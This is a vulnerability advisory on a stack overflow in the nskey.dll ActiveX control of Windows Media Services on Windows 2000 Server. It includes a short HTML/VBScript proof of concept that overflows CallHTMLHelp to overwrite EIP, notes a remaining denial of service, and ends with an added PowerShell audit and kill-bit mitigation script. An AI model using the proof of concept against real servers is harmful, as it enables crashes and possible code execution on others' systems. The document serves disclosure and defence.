Windows Media Services (nskey.dll) on Windows 2000 Server, Advanced Server, and Datacenter Edition all suffer from a stack overflow vulnerability. Using an ActiveX control that is marked safe for scripting/initializing, passing at least 9752 bytes to CallHTMLHelp will overwrite EIP, and remote code execution may be possible.
Product: Windows Media Services (nskey.dll)
Products affected/tested: Windows 2000 Server
Windows 2000 Advanced Server
Windows 2000 Datacenter Edition
Attack: Stack Overflow
Technical Details:
Via an ActiveX control that is marked safe for scripting/initializing, passing at least 9752 bytes
to CallHTMLHelp will overwrite EIP, and remote code execution may be possible.
PoC exploit:
<html><body>
<object id=target classid=clsid:2646205B-878C-11D1-B07C-0000C040BCDB></object>
<script language=vbscript>
arg1=String(9752, "A")
target.CallHTMLHelp arg1
</script>
</body></html>
This PoC should work fine and overwrite EIP, hitting 0x41414141 of course. Now for the
part about why I released this information...
Apparently this issue has been very silently fixed (I cannot find ANY information ANYWHERE for or relating to it) by Microsoft a few patches ago.
And... WINDOWS 2000 IS OLD. Widely used, but still pretty old for a modern operating system.
This bug was pretty exploitable until I used Windows Up2date :(
But, to no surprise, they didn't fix the bug completely. There's still a DoS after putting
about 525,000 bytes in the buffer. Oh well :)
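The control is only reachable from a web page because it is registered safe for scripting/initializing, so the practical defence on a Windows 2000 server that must keep Windows Media Services is to audit that registration and set the Internet Explorer kill bit for the CLSID. The following PowerShell script is an added example, not part of this advisory; it assumes the CLSID from the PoC above, the standard CATID_SafeForScripting / CATID_SafeForInitializing category GUIDs, and the standard "ActiveX Compatibility" kill-bit key (Compatibility Flags 0x400).

```powershell
# Added audit/mitigation script, not part of the original advisory.
# Assumes: the CLSID from the PoC; the standard IE safety-category GUIDs and the
# standard kill-bit registry key. Run elevated to write the kill bit under HKLM.
$Clsid               = '{2646205B-878C-11D1-B07C-0000C040BCDB}'   # control used by the PoC
$SafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForScripting
$SafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForInitializing
$KillBitFlag         = 0x400                                      # kill bit in "Compatibility Flags"

function Get-ActiveXExposure {
    param([string]$Clsid)
    $clsidKey  = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $catsKey   = "$clsidKey\Implemented Categories"
    $compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags = 0
    if (Test-Path $compatKey) {
        $p = Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($p) { $flags = [int]$p.'Compatibility Flags' }
    }
    [pscustomobject]@{
        Clsid               = $Clsid
        Registered          = Test-Path $clsidKey
        SafeForScripting    = Test-Path "$catsKey\$SafeForScripting"
        SafeForInitializing = Test-Path "$catsKey\$SafeForInitializing"
        KillBitSet          = (($flags -band $KillBitFlag) -ne 0)
    }
}

function Set-ActiveXKillBit {
    param([string]$Clsid)
    $compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    if (-not (Test-Path $compatKey)) { New-Item -Path $compatKey -Force | Out-Null }
    $p = Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    $current = if ($p) { [int]$p.'Compatibility Flags' } else { 0 }
    # OR the kill bit in so any compatibility flags already present are preserved
    New-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -PropertyType DWord `
        -Value ($current -bor $KillBitFlag) -Force | Out-Null
}

# Report the current state, then kill-bit the control if it is registered and not yet blocked
$state = Get-ActiveXExposure -Clsid $Clsid
$state | Format-List
if ($state.Registered -and -not $state.KillBitSet) {
    Set-ActiveXKillBit -Clsid $Clsid
    Get-ActiveXExposure -Clsid $Clsid | Format-List
}
```

The Implemented Categories check only sees controls that declare safety through the registry; a control that answers IObjectSafety at runtime will show False there yet still be scriptable, which is why the kill bit, not the category keys, is the check to rely on.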
Jeremy Brown (0xjbrown41@gmail.com)